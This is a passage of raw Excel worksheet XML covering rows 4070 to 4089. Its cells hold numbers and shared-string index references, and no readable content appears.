      <c r="W4070" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4070" s="12">
        <v>4</v>
      </c>
      <c r="Y4070" s="12" t="s">
        <v>26131</v>
      </c>
    </row>
    <row r="4071" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4071" s="12">
        <v>50491</v>
      </c>
      <c r="B4071" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4071" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4071" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4071" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4071" s="12" t="s">
        <v>26132</v>
      </c>
      <c r="H4071" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4071" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4071" s="12" t="s">
        <v>12140</v>
      </c>
      <c r="K4071" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4071" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M4071" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N4071" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O4071" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4071" s="12" t="s">
        <v>26133</v>
      </c>
      <c r="Q4071" s="12">
        <v>3</v>
      </c>
      <c r="R4071" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4071" s="12" t="s">
        <v>26134</v>
      </c>
      <c r="T4071" s="12" t="s">
        <v>5074</v>
      </c>
      <c r="U4071" s="12" t="s">
        <v>26135</v>
      </c>
      <c r="V4071" s="12" t="s">
        <v>5074</v>
      </c>
      <c r="W4071" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4071" s="12">
        <v>3</v>
      </c>
      <c r="Y4071" s="12" t="s">
        <v>26136</v>
      </c>
    </row>
    <row r="4072" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4072" s="12">
        <v>50631</v>
      </c>
      <c r="B4072" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4072" s="12" t="s">
        <v>30352</v>
      </c>
      <c r="F4072" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4072" s="12" t="s">
        <v>26138</v>
      </c>
      <c r="H4072" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4072" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4072" s="12" t="s">
        <v>9893</v>
      </c>
      <c r="K4072" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4072" s="12" t="s">
        <v>26139</v>
      </c>
      <c r="M4072" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4072" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4072" s="12" t="s">
        <v>31592</v>
      </c>
      <c r="P4072" s="12" t="s">
        <v>26140</v>
      </c>
      <c r="Q4072" s="12">
        <v>3.4</v>
      </c>
      <c r="R4072" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4072" s="12" t="s">
        <v>26141</v>
      </c>
      <c r="T4072" s="12" t="s">
        <v>26142</v>
      </c>
      <c r="U4072" s="12" t="s">
        <v>26143</v>
      </c>
      <c r="V4072" s="12" t="s">
        <v>20079</v>
      </c>
      <c r="W4072" s="12">
        <v>49401</v>
      </c>
      <c r="X4072" s="12">
        <v>9</v>
      </c>
      <c r="Y4072" s="12" t="s">
        <v>26144</v>
      </c>
    </row>
    <row r="4073" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4073" s="12">
        <v>51071</v>
      </c>
      <c r="B4073" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4073" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4073" s="12" t="s">
        <v>29838</v>
      </c>
      <c r="E4073" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4073" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4073" s="12" t="s">
        <v>26156</v>
      </c>
      <c r="H4073" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4073" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4073" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4073" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4073" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4073" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4073" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4073" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="Q4073" s="12">
        <v>3.7</v>
      </c>
      <c r="R4073" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4073" s="12" t="s">
        <v>26157</v>
      </c>
      <c r="T4073" s="12" t="s">
        <v>13118</v>
      </c>
      <c r="U4073" s="12" t="s">
        <v>26158</v>
      </c>
      <c r="V4073" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4073" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4073" s="12">
        <v>30</v>
      </c>
      <c r="Y4073" s="12" t="s">
        <v>26159</v>
      </c>
    </row>
    <row r="4074" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4074" s="12">
        <v>51141</v>
      </c>
      <c r="B4074" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4074" s="12" t="s">
        <v>30813</v>
      </c>
      <c r="E4074" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4074" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4074" s="12" t="s">
        <v>26160</v>
      </c>
      <c r="H4074" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4074" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4074" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4074" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4074" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M4074" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N4074" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O4074" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4074" s="12" t="s">
        <v>26161</v>
      </c>
      <c r="Q4074" s="12">
        <v>3.6</v>
      </c>
      <c r="R4074" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4074" s="12" t="s">
        <v>26162</v>
      </c>
      <c r="T4074" s="12" t="s">
        <v>26163</v>
      </c>
      <c r="U4074" s="12" t="s">
        <v>26164</v>
      </c>
      <c r="V4074" s="12" t="s">
        <v>5207</v>
      </c>
      <c r="W4074" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4074" s="12">
        <v>26</v>
      </c>
      <c r="Y4074" s="12" t="s">
        <v>26165</v>
      </c>
    </row>
    <row r="4075" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4075" s="12">
        <v>51231</v>
      </c>
      <c r="B4075" s="12" t="s">
        <v>30503</v>
      </c>
      <c r="C4075" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4075" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4075" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4075" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4075" s="12" t="s">
        <v>26166</v>
      </c>
      <c r="H4075" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4075" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4075" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4075" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4075" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4075" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4075" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4075" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4075" s="12" t="s">
        <v>26167</v>
      </c>
      <c r="Q4075" s="12">
        <v>3.7</v>
      </c>
      <c r="R4075" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4075" s="12" t="s">
        <v>26168</v>
      </c>
      <c r="T4075" s="12" t="s">
        <v>26169</v>
      </c>
      <c r="U4075" s="12" t="s">
        <v>26170</v>
      </c>
      <c r="V4075" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4075" s="12" t="s">
        <v>26171</v>
      </c>
      <c r="X4075" s="12">
        <v>181</v>
      </c>
      <c r="Y4075" s="12" t="s">
        <v>26172</v>
      </c>
    </row>
    <row r="4076" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4076" s="12">
        <v>51431</v>
      </c>
      <c r="B4076" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4076" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4076" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4076" s="12" t="s">
        <v>26173</v>
      </c>
      <c r="H4076" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4076" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4076" s="12" t="s">
        <v>12555</v>
      </c>
      <c r="K4076" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4076" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4076" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4076" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4076" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4076" s="12" t="s">
        <v>26174</v>
      </c>
      <c r="Q4076" s="12">
        <v>3</v>
      </c>
      <c r="R4076" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4076" s="12" t="s">
        <v>26175</v>
      </c>
      <c r="T4076" s="12" t="s">
        <v>26176</v>
      </c>
      <c r="U4076" s="12" t="s">
        <v>26177</v>
      </c>
      <c r="V4076" s="12" t="s">
        <v>13296</v>
      </c>
      <c r="W4076" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4076" s="12">
        <v>7</v>
      </c>
      <c r="Y4076" s="12" t="s">
        <v>26178</v>
      </c>
    </row>
    <row r="4077" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4077" s="12">
        <v>51531</v>
      </c>
      <c r="B4077" s="12" t="s">
        <v>31396</v>
      </c>
      <c r="D4077" s="12" t="s">
        <v>31546</v>
      </c>
      <c r="F4077" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4077" s="12" t="s">
        <v>26179</v>
      </c>
      <c r="H4077" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4077" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4077" s="12" t="s">
        <v>963</v>
      </c>
      <c r="K4077" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4077" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4077" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4077" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4077" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4077" s="12" t="s">
        <v>26180</v>
      </c>
      <c r="Q4077" s="12">
        <v>3.6</v>
      </c>
      <c r="R4077" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4077" s="12" t="s">
        <v>26181</v>
      </c>
      <c r="T4077" s="12" t="s">
        <v>21908</v>
      </c>
      <c r="U4077" s="12" t="s">
        <v>26182</v>
      </c>
      <c r="V4077" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4077" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4077" s="12">
        <v>15</v>
      </c>
      <c r="Y4077" s="12" t="s">
        <v>26183</v>
      </c>
    </row>
    <row r="4078" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4078" s="12">
        <v>51661</v>
      </c>
      <c r="B4078" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4078" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4078" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F4078" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4078" s="12" t="s">
        <v>26189</v>
      </c>
      <c r="H4078" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4078" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4078" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4078" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4078" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4078" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4078" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4078" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4078" s="12">
        <v>3.7</v>
      </c>
      <c r="Q4078" s="12">
        <v>3.7</v>
      </c>
      <c r="R4078" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4078" s="12" t="s">
        <v>26190</v>
      </c>
      <c r="T4078" s="12" t="s">
        <v>26191</v>
      </c>
      <c r="U4078" s="12" t="s">
        <v>26192</v>
      </c>
      <c r="V4078" s="12" t="s">
        <v>6918</v>
      </c>
      <c r="W4078" s="12">
        <v>51721</v>
      </c>
      <c r="X4078" s="12">
        <v>14</v>
      </c>
      <c r="Y4078" s="12" t="s">
        <v>26193</v>
      </c>
    </row>
    <row r="4079" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4079" s="12">
        <v>51671</v>
      </c>
      <c r="B4079" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4079" s="12" t="s">
        <v>31375</v>
      </c>
      <c r="F4079" s="12" t="s">
        <v>31374</v>
      </c>
      <c r="G4079" s="12" t="s">
        <v>26194</v>
      </c>
      <c r="H4079" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4079" s="12" t="s">
        <v>26195</v>
      </c>
      <c r="J4079" s="12" t="s">
        <v>26196</v>
      </c>
      <c r="K4079" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4079" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4079" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4079" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4079" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4079" s="12" t="s">
        <v>26197</v>
      </c>
      <c r="Q4079" s="12">
        <v>3.7</v>
      </c>
      <c r="R4079" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4079" s="12" t="s">
        <v>26198</v>
      </c>
      <c r="T4079" s="12" t="s">
        <v>26199</v>
      </c>
      <c r="U4079" s="12" t="s">
        <v>26200</v>
      </c>
      <c r="V4079" s="12" t="s">
        <v>26201</v>
      </c>
      <c r="W4079" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4079" s="12">
        <v>15</v>
      </c>
      <c r="Y4079" s="12" t="s">
        <v>26202</v>
      </c>
    </row>
    <row r="4080" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4080" s="12">
        <v>51731</v>
      </c>
      <c r="B4080" s="12" t="s">
        <v>30814</v>
      </c>
      <c r="D4080" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4080" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4080" s="12" t="s">
        <v>30773</v>
      </c>
      <c r="G4080" s="12" t="s">
        <v>26203</v>
      </c>
      <c r="H4080" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4080" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4080" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4080" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4080" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4080" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4080" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4080" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4080" s="12" t="s">
        <v>26204</v>
      </c>
      <c r="Q4080" s="12">
        <v>3.4</v>
      </c>
      <c r="R4080" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4080" s="12" t="s">
        <v>26205</v>
      </c>
      <c r="T4080" s="12" t="s">
        <v>26206</v>
      </c>
      <c r="U4080" s="12" t="s">
        <v>26207</v>
      </c>
      <c r="V4080" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4080" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4080" s="12">
        <v>28</v>
      </c>
      <c r="Y4080" s="12" t="s">
        <v>26208</v>
      </c>
    </row>
    <row r="4081" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4081" s="12">
        <v>51881</v>
      </c>
      <c r="B4081" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4081" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4081" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4081" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4081" s="12" t="s">
        <v>26214</v>
      </c>
      <c r="H4081" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4081" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4081" s="12" t="s">
        <v>129</v>
      </c>
      <c r="K4081" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4081" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4081" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4081" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4081" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4081" s="12">
        <v>3.7</v>
      </c>
      <c r="Q4081" s="12">
        <v>3.7</v>
      </c>
      <c r="R4081" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4081" s="12" t="s">
        <v>26215</v>
      </c>
      <c r="T4081" s="12" t="s">
        <v>26216</v>
      </c>
      <c r="U4081" s="12" t="s">
        <v>26217</v>
      </c>
      <c r="V4081" s="12" t="s">
        <v>8682</v>
      </c>
      <c r="W4081" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4081" s="12">
        <v>11</v>
      </c>
      <c r="Y4081" s="12" t="s">
        <v>26218</v>
      </c>
    </row>
    <row r="4082" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4082" s="12">
        <v>52041</v>
      </c>
      <c r="B4082" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4082" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4082" s="12" t="s">
        <v>31497</v>
      </c>
      <c r="F4082" s="12" t="s">
        <v>30738</v>
      </c>
      <c r="G4082" s="12" t="s">
        <v>26225</v>
      </c>
      <c r="H4082" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4082" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J4082" s="12" t="s">
        <v>342</v>
      </c>
      <c r="K4082" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4082" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4082" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4082" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4082" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4082" s="12" t="s">
        <v>26137</v>
      </c>
      <c r="Q4082" s="12">
        <v>3.5</v>
      </c>
      <c r="R4082" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4082" s="12" t="s">
        <v>26226</v>
      </c>
      <c r="T4082" s="12" t="s">
        <v>3649</v>
      </c>
      <c r="U4082" s="12" t="s">
        <v>26227</v>
      </c>
      <c r="V4082" s="12" t="s">
        <v>5655</v>
      </c>
      <c r="W4082" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4082" s="12">
        <v>13</v>
      </c>
      <c r="Y4082" s="12" t="s">
        <v>26228</v>
      </c>
    </row>
    <row r="4083" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4083" s="12">
        <v>52191</v>
      </c>
      <c r="B4083" s="12" t="s">
        <v>31154</v>
      </c>
      <c r="C4083" s="12" t="s">
        <v>31155</v>
      </c>
      <c r="D4083" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4083" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4083" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4083" s="12" t="s">
        <v>26229</v>
      </c>
      <c r="H4083" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4083" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4083" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4083" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4083" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4083" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4083" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4083" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4083" s="12" t="s">
        <v>26230</v>
      </c>
      <c r="Q4083" s="12">
        <v>3.7</v>
      </c>
      <c r="R4083" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4083" s="12" t="s">
        <v>26231</v>
      </c>
      <c r="T4083" s="12" t="s">
        <v>26232</v>
      </c>
      <c r="U4083" s="12" t="s">
        <v>26233</v>
      </c>
      <c r="V4083" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4083" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4083" s="12">
        <v>55</v>
      </c>
      <c r="Y4083" s="12" t="s">
        <v>26234</v>
      </c>
    </row>
    <row r="4084" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4084" s="12">
        <v>52231</v>
      </c>
      <c r="B4084" s="12" t="s">
        <v>29860</v>
      </c>
      <c r="C4084" s="12" t="s">
        <v>29837</v>
      </c>
      <c r="D4084" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4084" s="12" t="s">
        <v>29838</v>
      </c>
      <c r="G4084" s="12" t="s">
        <v>26235</v>
      </c>
      <c r="H4084" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4084" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4084" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K4084" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4084" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4084" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4084" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4084" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4084" s="12" t="s">
        <v>26236</v>
      </c>
      <c r="Q4084" s="12">
        <v>3.8</v>
      </c>
      <c r="R4084" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4084" s="12" t="s">
        <v>26237</v>
      </c>
      <c r="T4084" s="12" t="s">
        <v>4675</v>
      </c>
      <c r="U4084" s="12" t="s">
        <v>26238</v>
      </c>
      <c r="V4084" s="12" t="s">
        <v>179</v>
      </c>
      <c r="W4084" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4084" s="12">
        <v>2</v>
      </c>
      <c r="Y4084" s="12" t="s">
        <v>26239</v>
      </c>
    </row>
    <row r="4085" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4085" s="12">
        <v>52331</v>
      </c>
      <c r="B4085" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C4085" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D4085" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4085" s="18" t="s">
        <v>31429</v>
      </c>
      <c r="F4085" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G4085" s="12" t="s">
        <v>26240</v>
      </c>
      <c r="H4085" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4085" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4085" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K4085" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4085" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4085" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4085" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4085" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4085" s="12" t="s">
        <v>26241</v>
      </c>
      <c r="Q4085" s="12">
        <v>3.2</v>
      </c>
      <c r="R4085" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4085" s="12" t="s">
        <v>26242</v>
      </c>
      <c r="T4085" s="12" t="s">
        <v>26243</v>
      </c>
      <c r="U4085" s="12" t="s">
        <v>26244</v>
      </c>
      <c r="V4085" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W4085" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4085" s="12">
        <v>0</v>
      </c>
      <c r="Y4085" s="12" t="s">
        <v>26245</v>
      </c>
    </row>
    <row r="4086" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4086" s="12">
        <v>52471</v>
      </c>
      <c r="B4086" s="12" t="s">
        <v>31154</v>
      </c>
      <c r="C4086" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4086" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4086" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F4086" s="12" t="s">
        <v>31156</v>
      </c>
      <c r="G4086" s="12" t="s">
        <v>26246</v>
      </c>
      <c r="H4086" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4086" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4086" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K4086" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4086" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4086" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4086" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4086" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4086" s="12">
        <v>3.7</v>
      </c>
      <c r="Q4086" s="12">
        <v>3.7</v>
      </c>
      <c r="R4086" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4086" s="12" t="s">
        <v>26247</v>
      </c>
      <c r="T4086" s="12" t="s">
        <v>19325</v>
      </c>
      <c r="U4086" s="12" t="s">
        <v>26248</v>
      </c>
      <c r="V4086" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W4086" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4086" s="12">
        <v>10</v>
      </c>
      <c r="Y4086" s="12" t="s">
        <v>26249</v>
      </c>
    </row>
    <row r="4087" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4087" s="12">
        <v>52611</v>
      </c>
      <c r="B4087" s="12" t="s">
        <v>31148</v>
      </c>
      <c r="D4087" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4087" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4087" s="12" t="s">
        <v>26250</v>
      </c>
      <c r="H4087" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4087" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J4087" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K4087" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4087" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4087" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4087" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4087" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4087" s="12" t="s">
        <v>26251</v>
      </c>
      <c r="Q4087" s="12">
        <v>3.8</v>
      </c>
      <c r="R4087" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4087" s="12" t="s">
        <v>26252</v>
      </c>
      <c r="T4087" s="12" t="s">
        <v>26253</v>
      </c>
      <c r="U4087" s="12" t="s">
        <v>26254</v>
      </c>
      <c r="V4087" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W4087" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4087" s="12">
        <v>2</v>
      </c>
      <c r="Y4087" s="12" t="s">
        <v>26255</v>
      </c>
    </row>
    <row r="4088" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4088" s="12">
        <v>52891</v>
      </c>
      <c r="B4088" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4088" s="12" t="s">
        <v>31373</v>
      </c>
      <c r="F4088" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4088" s="12" t="s">
        <v>26256</v>
      </c>
      <c r="H4088" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4088" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4088" s="12" t="s">
        <v>26257</v>
      </c>
      <c r="K4088" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4088" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4088" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4088" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4088" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4088" s="12" t="s">
        <v>26258</v>
      </c>
      <c r="Q4088" s="12">
        <v>3.8</v>
      </c>
      <c r="R4088" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4088" s="12" t="s">
        <v>26259</v>
      </c>
      <c r="T4088" s="12" t="s">
        <v>26260</v>
      </c>
      <c r="U4088" s="12" t="s">
        <v>26261</v>
      </c>
      <c r="V4088" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W4088" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4088" s="12">
        <v>23</v>
      </c>
      <c r="Y4088" s="12" t="s">
        <v>26262</v>
      </c>
    </row>
    <row r="4089" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4089" s="12">
        <v>52951</v>
      </c>
      <c r="B4089" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4089" s="18" t="s">
        <v>28349</v>
      </c>
